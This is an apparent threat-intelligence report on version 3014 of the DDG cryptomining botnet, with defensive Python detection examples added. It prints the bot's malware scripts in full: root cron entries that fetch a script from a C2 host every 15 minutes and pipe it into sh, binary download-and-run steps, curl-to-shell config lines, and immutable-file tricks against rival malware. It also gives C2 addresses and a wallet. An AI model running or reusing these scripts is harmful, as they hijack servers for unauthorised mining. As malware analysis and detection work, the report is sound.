Threat Alert: DDG Version 3014

DDG is a botnet that scans for and takes control of SSH, Redis database and OrientDB database servers, then hijacks the servers' computing power to mine cryptocurrency (Monero). We first detected the DDG botnet on October 25, 2017, and published a report shortly afterwards. Our most recent report was published in 2018-08, at which point DDG had been updated to version 3013.

Recently, we noticed that DDG has been updated to version 3014.

1. Basic Information

Full set of samples (figure):

Samples in the v3014 directory (figure):

Details of the newly appeared samples:

hxxp://149.56.106.215:8000/static/3014/ddgs.i686      md5=dcecbe02489d15ea34b7b13aa6d40639
hxxp://149.56.106.215:8000/static/3014/ddgs.x86_64    md5=ad0dd11e74f118977c6c109f4d5f8b0a
hxxp://149.56.106.215:8000/static/qW3xT.3             md5=45106124496d4492197bbb16c18652c6
hxxp://149.56.106.215:8000/static/qW3xT.4             md5=9dd8c5b1dc74286d81bc78372d9b7f27

i.sh (v3014):

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "" > /var/spool/cron/root

echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root

mkdir -p /var/spool/cron/crontabs  
echo "" > /var/spool/cron/crontabs/root

echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

ps auxf | grep -v grep | grep /tmp/ddgs.3014 || rm -rf /tmp/ddgs.3014  
if [ ! -f "/tmp/ddgs.3014" ]; then  
    wget -q http://149.56.106.215:8000/static/3014/ddgs.$(uname -m) -O /tmp/ddgs.3014

fi  
chmod +x /tmp/ddgs.3014 && /tmp/ddgs.3014

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill  
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill  
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill  
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill  
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill  
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill  
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
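
As an added example (not part of the original post, and not DDG's code), the Python below shows how a defender can hunt for the persistence that i.sh installs: a root crontab entry that fetches a script over HTTP every few minutes and pipes it straight into sh. It generalizes beyond the exact line above to any wget/curl-to-shell cron entry, and tags hosts that this report names as DDG infrastructure. The crontab text is constructed sample input; 198.51.100.7 is a documentation address, not an observed indicator.

```python
import re
from typing import Dict, List
from urllib.parse import urlparse

# Addresses named in this report: the C2/download host, the new iplist entry and
# the new mining proxy.  Anything else the scanner flags is "unknown", not "clean".
KNOWN_DDG_INFRA = {"149.56.106.215", "47.95.200.188", "59.2.77.151"}

# A cron entry is five schedule fields followed by a command.  We flag commands that
# download with `wget -q -O-` or `curl -fsSL` and pipe the body into sh/bash, which is
# exactly what i.sh writes into /var/spool/cron/root every 15 minutes.
PIPE_TO_SH = re.compile(
    r"^(?:\S+\s+){5}.*?"
    r"(?:wget\s+-q\s+-O-\s*|curl\s+-fsSL\s+)"
    r"(https?://[^\s|]+)"
    r"\s*\|\s*(?:ba)?sh\b"
)

# Constructed crontab content (sample input, not captured from a real host).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh
*/10 * * * * curl -fsSL http://198.51.100.7:8000/i.sh | sh
30 2 * * 0 /usr/local/bin/backup.sh
"""


def scan_crontab(text: str) -> List[Dict]:
    """Return one finding per download-and-execute cron line."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        m = PIPE_TO_SH.search(stripped)
        if not m:
            continue
        url = m.group(1)
        parsed = urlparse(url)
        findings.append({
            "line_no": line_no,
            "schedule": " ".join(stripped.split()[:5]),
            "url": url,
            "host": parsed.hostname,
            "port": parsed.port,
            "known_ddg_infra": parsed.hostname in KNOWN_DDG_INFRA,
        })
    return findings


def summarize(findings: List[Dict]) -> str:
    """Human-readable lines for an alert or ticket body."""
    lines = []
    for f in findings:
        tag = "KNOWN DDG infrastructure" if f["known_ddg_infra"] else "unknown host"
        lines.append(f"line {f['line_no']}: {f['schedule']} -> {f['url']} ({tag})")
    return "\n".join(lines)


if __name__ == "__main__":
    # On a live host, read both files i.sh rewrites, /var/spool/cron/root and
    # /var/spool/cron/crontabs/root, and pass their contents in instead.
    print(summarize(scan_crontab(SAMPLE_CRONTAB)))
```

Because i.sh overwrites both /var/spool/cron/root and /var/spool/cron/crontabs/root, a check that reads only one of them can miss the entry; the 15-minute re-download also means that blocking the C2 host without removing the cron line leaves a noisy, recurring outbound connection attempt that is itself a useful detection signal.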

2. New Features

2.1 The main sample itself:

Compared with v3013, the main ddg sample is compiled with Go 1.10.3 and its functionality is almost unchanged; the only difference is that the built-in iplist gained one new IP:

47.95.200.188 China/CN    "AS37963 Hangzhou Alibaba Advertising Co.,Ltd."  

2.2 Miners

The two new miner samples, qW3xT.3 and qW3xT.4, show the following 2 changes:

  1. They are built from the newer XMRig 2.8.1;

  2. qW3xT.4 adds a new mining proxy:
    59.2.77.151 Republic of Korea/KR "AS4766 Korea Telecom"

The wallet is unchanged, still:

42d4D8pASAWghyTmUS8a9yZyErA4WB18TJ6Xd2rZt9HBio2aPmAAVpHcPM8yoDEYD9Fy7eRvPJhR7SKFyTaFbSYCNZ2t3ik

The latest figures are:

Connected Pool: nanopool

Paid: 24.1394850336

2.3 Cloud Configuration File

Using the same mechanism as v3013, the main ddg sample iterates over every ip:8000 in its iplist; once a connection succeeds, it sends the following request:

On receiving the request above, the C2 returns a block of configuration data in a custom format serialized with MsgPack. The cloud config has changed somewhat compared with v3013; decoded and tidied up, it looks roughly as follows:

{Data: 
    Config:
    Interval: "360s";
    Miner: [{
        Exe: "/tmp/qW3xT.4",
        Md5: 9dd8c5b1dc74286d81bc78372d9b7f27,
        Url: "/static/qW3xT.4"
    }], 
    Cmd:[
        AAredis:{
            Id: 6093,
            Version: 3021,
            ShellUrl: "http://149.56.106.215:8000/i.sh",
            NThreads: 204,
            Duration: "240h",
            IPDuration: "26h",
            GenLan,
            GenAAA,
            Timeout: "21m",
            Ports: (5379, 6379, 7379)
        },
        AAssh:{
            Id: 2253,
            Version: 3021,
            ShellUrl: "http://149.56.106.215:8000/i.sh", 
            Duration: "240h",
            IPDuration: "312h",
            GenLan,
            GenAAA,
            Timeout: "21m",
            Ports: (22, 2222)
        },
        Sh:[
            {
                Id: 398,
                Version: 255,
                Timeout: "120s",
                Line: "curl -fsSL http://149.56.106.215:8000/static/disable.sh | sh"
            },{
                Id: 461,
                Version: 3013,
                Line: "curl -fsSL http://149.56.106.215:8000/i.sh | sh",
                Timeout: "120s",
                Killer: 132
            },{
                Id: 388,
                Version: 3014,
                Expr: "/tmp/ddgs.3013",
                Timeout: "360s"
            },{
                Id: 389,
                Version: 3014,
                Expr: ".+(cryptonight|stratum+tcp://|dwarfpool.com|supportxmr.com).+",
                Timeout: "360s"
            },{
                Id: 390,
                Version: 3014,
                Expr: "./xmr-stak|./.syslog|/bin/wipefs|./xmrig|/tmp/wnTKYg",
                Timeout: "360s"
            },{
                Id: 381,
                Version: 255,
                Expr: "/tmp/2t3ik.+"
            },{
                Id: 397,
                Version: 255,
                Expr: "/tmp/qW3xT.+",
                Timeout: "360s"
            }
        ]
    ],
    Signature: 
        'B|\x88Q\xe1"E\x12;\x8f\xf0$\n\xca\xce\x8da\x89\xfcW\x1d\x9dm\x10\x01\xf9\x84H\x19\x03\xc70e\xa2[\x04\xd1G\xba\xabQ;\x9d\xc7\x01C\x17k\xad\x9a-\x9c\xae\x82\xd2\xb8\x80\x81}\xdd\xb9@\xf1\x7fE\xd6\xed\xab\xe9\x08\xb2-\x8c\xad\xfd\xe9 "R\xdd\x91Y\xffgf\xaf\xb6y0\x8c$\x18\xad\xb8\xcb\xe89.\x01\x16\xfb\xf0\x93\xfaBA>]h+F\xe4\xd9\x9c\xc1\x1cOI\xd7\x16P%\xec~\xee\xeb`\x8d\xbe\xf7\x07\x1dM\x85\x88\x8eT\xcc\xb8 x`\n\xc2\xf7X\xc1E\x8e)\x1c\x16n\xebw\x13\xef=;\x1f_Y7Zof(/\x19#\xf1\xbb\xb9s\x86;\x11zlC\xcbh\xfa\xb0\xca\xd6%\nQ\x948L\x8c_\xc8\xb5O6(Y\x99\xa2\xfb\x04\xef\xf2\xbe\x11\xc7w\xc7\x87\x0e\xc2\xe3\xbca)|\xea0 "\x8b\x96q\x14q\xe68\xb7\x1eo\x16\x02\xd4\xba\xfc\\\x8a\x95\x18\xb1\xc9>p=\xb0\xf6\xf6N\xa5\x87;\xde\xf4\xb4\x83'
    }
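
The Sh entries of the config carry Expr fields next to a Killer id, and the kill lines in i.sh show the bot hunting rival miners by process name. The Python below is an added example (not the bot's code and not from the original post) that treats each Expr as a regular expression over process command lines, which is an assumption drawn from that evidence, and shows which entries of a constructed ps listing the expressions would hit. A defender can reuse the same expressions as miner-hunting signatures, with one caveat the code makes visible: in expression 389 the + in stratum+tcp:// is a quantifier, so the pattern only matches the literal text stratumtcp:// and misses real stratum+tcp:// pool URLs.

```python
import re
from typing import Dict, List, Tuple

# Expr fields copied from the Sh entries of the decoded v3014 config above, keyed by Id.
# Assumption (see lead-in): each is a regex the bot matches against process command lines.
KILL_EXPRS: Dict[int, str] = {
    388: r"/tmp/ddgs.3013",                                                  # previous DDG build
    389: r".+(cryptonight|stratum+tcp://|dwarfpool.com|supportxmr.com).+",  # rival miner cmdlines
    390: r"./xmr-stak|./.syslog|/bin/wipefs|./xmrig|/tmp/wnTKYg",           # rival miner binaries
    381: r"/tmp/2t3ik.+",                                                    # rival miner path
    397: r"/tmp/qW3xT.+",                                                    # the miner this config deploys
}
COMPILED = {cid: re.compile(pat) for cid, pat in KILL_EXPRS.items()}

# Constructed `ps -eo pid,args` output (sample input, not real telemetry).  Note that
# pid 303 uses the real stratum+tcp:// scheme while pid 606 uses the typo'd form.
SAMPLE_PS = """\
  101 /usr/sbin/sshd -D
  202 /tmp/ddgs.3013
  303 ./xmrig -o stratum+tcp://pool.example:3333 -u wallet
  404 /tmp/qW3xT.4
  505 /usr/bin/python3 /opt/app/worker.py
  606 /opt/miner/run -o stratumtcp://pool.example:3333 -k
"""


def parse_ps(text: str) -> List[Tuple[int, str]]:
    """Turn `pid args` lines into (pid, cmdline) pairs."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        pid, _, args = line.partition(" ")
        rows.append((int(pid), args.strip()))
    return rows


def matching_exprs(cmdline: str) -> List[int]:
    """Ids of every Expr that fires on this command line, in ascending order."""
    return sorted(cid for cid, rx in COMPILED.items() if rx.search(cmdline))


def hunt(text: str) -> Dict[int, List[int]]:
    """Map each pid that at least one Expr hits to the list of Expr ids that hit it."""
    result = {}
    for pid, args in parse_ps(text):
        hits = matching_exprs(args)
        if hits:
            result[pid] = hits
    return result


if __name__ == "__main__":
    for pid, hits in hunt(SAMPLE_PS).items():
        print(f"pid {pid}: matched Expr ids {hits}")
```

Two details worth noticing when reusing these expressions defensively: the leading and trailing .+ in expression 389 require at least one character on either side of the keyword, so a command line that ends in cryptonight is not matched; and because the stratum+tcp:// branch can never match a real pool URL, expression 389 effectively relies on cryptonight and the two pool domains alone.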

Of particular note, the second-stage configuration adds a new shell script:

http://149.56.106.215:8000/static/disable.sh  

Its contents are as follows:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /opt/yilu/work/xig /opt/yilu/work/xige /usr/bin/bsd-port  
touch /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty  
chmod -x /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty  
chattr +i /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty

ps auxf | grep -v grep | grep /tmp/thisxxs | awk '{print $2}' | xargs kill  
ps auxf | grep -v grep | grep /opt/yilu/work/xig/xig | awk '{print $2}' | xargs kill  
ps auxf | grep -v grep | grep /opt/yilu/mservice | awk '{print $2}' | xargs kill  
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill  
ps auxf | grep -v grep | grep /usr/bin/bsd-port/getty | awk '{print $2}' | xargs kill  

It is apparent that the author has split part of the work of killing other competing malicious processes out into this separate script, in which:

  • the yilu-related processes are the mining processes of this platform: http://www.yiluzhuanqian.com/
  • getty is a process of the well-known BillGates malware family.
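
disable.sh does more than kill rivals: it creates each rival's expected file path as an empty, non-executable file and pins it with chattr +i, so that the competing family can neither write nor execute there. As an added example (not from the original post), the Python below parses lsattr output and reports immutable files in three buckets: the paths disable.sh squats on, any other immutable file under /tmp or /usr/bin (where legitimate files are rarely pinned), and everything else. It also emits the cleanup step an operator needs, because rm on an immutable file fails even as root until chattr -i is run. The lsattr lines are constructed sample input; the attribute field layout mirrors lsattr(1), one dash per unset attribute and a letter per set one.

```python
import shlex
from typing import Dict, List, Tuple

# Paths that disable.sh creates as empty, non-executable, immutable files
# (copied from the script above).
SQUATTED_PATHS = {
    "/opt/yilu/mservice",
    "/opt/yilu/work/xig/xig",
    "/opt/yilu/work/xige/xige",
    "/tmp/thisxxs",
    "/usr/bin/.sshd",
    "/usr/bin/bsd-port/getty",
}

# Directories where an immutable file is unusual enough to report on its own.
WATCHED_DIRS = ("/tmp", "/usr/bin")

# Constructed lsattr output (sample input, not from a real host).  Each line is the
# attribute field, a space, then the path; an 'i' in the field means immutable.
SAMPLE_LSATTR = """\
----i---------e---- /usr/bin/.sshd
--------------e---- /usr/bin/bash
----i---------e---- /tmp/thisxxs
----i---------e---- /usr/bin/.cache_helper
--------------e---- /tmp/session.sock
----i---------e---- /etc/resolv.conf
"""


def parse_lsattr(text: str) -> List[Tuple[str, str]]:
    """Return (path, attribute_field) pairs from lsattr output."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        attrs, _, path = line.partition(" ")
        rows.append((path.strip(), attrs))
    return rows


def classify_immutables(text: str) -> Dict[str, List[str]]:
    """Bucket immutable files: known DDG squats, other immutables in watched dirs, the rest."""
    report: Dict[str, List[str]] = {"ddg_squat": [], "watched_dir": [], "other": []}
    for path, attrs in parse_lsattr(text):
        if "i" not in attrs:
            continue
        if path in SQUATTED_PATHS:
            report["ddg_squat"].append(path)
        elif any(path.startswith(d + "/") for d in WATCHED_DIRS):
            report["watched_dir"].append(path)
        else:
            report["other"].append(path)
    for bucket in report.values():
        bucket.sort()
    return report


def cleanup_commands(paths: List[str]) -> List[str]:
    """Shell commands for confirmed squats: drop the immutable bit first, then remove the file."""
    return [f"chattr -i {shlex.quote(p)} && rm -f {shlex.quote(p)}" for p in paths]


if __name__ == "__main__":
    # On a live host, feed in the output of `lsattr -a` over /tmp, /usr/bin and /opt.
    report = classify_immutables(SAMPLE_LSATTR)
    for bucket, paths in report.items():
        print(bucket, paths)
    for cmd in cleanup_commands(report["ddg_squat"]):
        print(cmd)
```

An immutable /etc/resolv.conf is a common administrative choice and lands in the "other" bucket, which is why the report separates it from the watched directories rather than treating every immutable file as suspicious; a genuinely unknown immutable file under /usr/bin, like the constructed .cache_helper entry, deserves a look even when it does not match a known path.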